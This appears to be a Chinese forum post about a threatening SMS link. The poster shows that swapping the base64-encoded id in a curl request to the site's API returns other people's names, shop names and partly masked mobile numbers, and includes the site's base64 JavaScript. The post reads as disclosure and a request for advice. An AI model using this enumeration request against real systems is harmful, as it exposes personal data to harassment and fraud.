我爸今早收到了一条恐吓短信.内容是这样的
短信上的短链接是这样的.
http://caiyue.cy99.cc/#/pages/index/p?id=2054xxx
把 xxx
换成任意数字.都会出现一家企业名称和经营者姓名(可能是法人).
网页内容是这样的
curl请求可以获取到手机号等敏感信息 (微信信息可能是打开网页授权的时候更新?)
curl 'http://caiyue.cy99.cc/api/shop.asmx/shop_service_request' \
-H 'Accept: */*' \
-H 'Origin: http://caiyue.cy99.cc' \
-H 'Proxy-Connection: keep-alive' \
-H 'Referer: http://caiyue.cy99.cc/' \
-H 'content-type: application/x-www-form-urlencoded' \
--data-raw 'p_method=shop.user.ino.get&p_token=&p_parms=eyJpZCI6IjIwNTQ2OTAifQ%3D%3D' \
--compressed \
--insecure
结果
<?xml version="1.0" encoding="utf-8"?>
<string xmlns="http://tempuri.org/">{"RESULT":0,"MSG":"数据获取成功","DATA":{"Id":2054xxx,"NickName":"田国海","Name":"沙依巴克区国贸xxx唯百货商行","IdNumber":"","Mobile":"13899989xxx","WeChatOpenId":""}}</string>
eyJpZCI6IjIwNTQ2OTAifQ==
是加密来的 : 加密("{"id":"2054xxx"}"
)
加密解密方法
function r() {
var e = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
this.encode = function(n) {
var o, t, r, i, c, a, u, f = "", l = 0;
n = function(e) {
e = e.replace(/\r\n/g, "\n");
for (var n = "", o = 0; o < e.length; o++) {
var t = e.charCodeAt(o);
t < 128 ? n += String.fromCharCode(t) : t > 127 && t < 2048 ? (n += String.fromCharCode(t >> 6 | 192),
n += String.fromCharCode(63 & t | 128)) : (n += String.fromCharCode(t >> 12 | 224),
n += String.fromCharCode(t >> 6 & 63 | 128),
n += String.fromCharCode(63 & t | 128))
}
return n
}(n);
while (l < n.length)
o = n.charCodeAt(l++),
t = n.charCodeAt(l++),
r = n.charCodeAt(l++),
i = o >> 2,
c = (3 & o) << 4 | t >> 4,
a = (15 & t) << 2 | r >> 6,
u = 63 & r,
isNaN(t) ? a = u = 64 : isNaN(r) && (u = 64),
f = f + e.charAt(i) + e.charAt(c) + e.charAt(a) + e.charAt(u);
return f
}
,
this.decode = function(n) {
var o, t, r, i, c, a, u, f = "", l = 0;
n = n.replace(/[^A-Za-z0-9\+\/\=]/g, "");
while (l < n.length)
i = e.indexOf(n.charAt(l++)),
c = e.indexOf(n.charAt(l++)),
a = e.indexOf(n.charAt(l++)),
u = e.indexOf(n.charAt(l++)),
o = i << 2 | c >> 4,
t = (15 & c) << 4 | a >> 2,
r = (3 & a) << 6 | u,
f += String.fromCharCode(o),
64 != a && (f += String.fromCharCode(t)),
64 != u && (f += String.fromCharCode(r));
return f = function(e) {
var n = ""
, o = 0
, t = c1 = c2 = 0;
while (o < e.length)
t = e.charCodeAt(o),
t < 128 ? (n += String.fromCharCode(t),
o++) : t > 191 && t < 224 ? (c2 = e.charCodeAt(o + 1),
n += String.fromCharCode((31 & t) << 6 | 63 & c2),
o += 2) : (c2 = e.charCodeAt(o + 1),
c3 = e.charCodeAt(o + 2),
n += String.fromCharCode((15 & t) << 12 | (63 & c2) << 6 | 63 & c3),
o += 3);
return n
}(f),
f
}
}
是正常的base64编码.开始以为是变体
该怎么处理?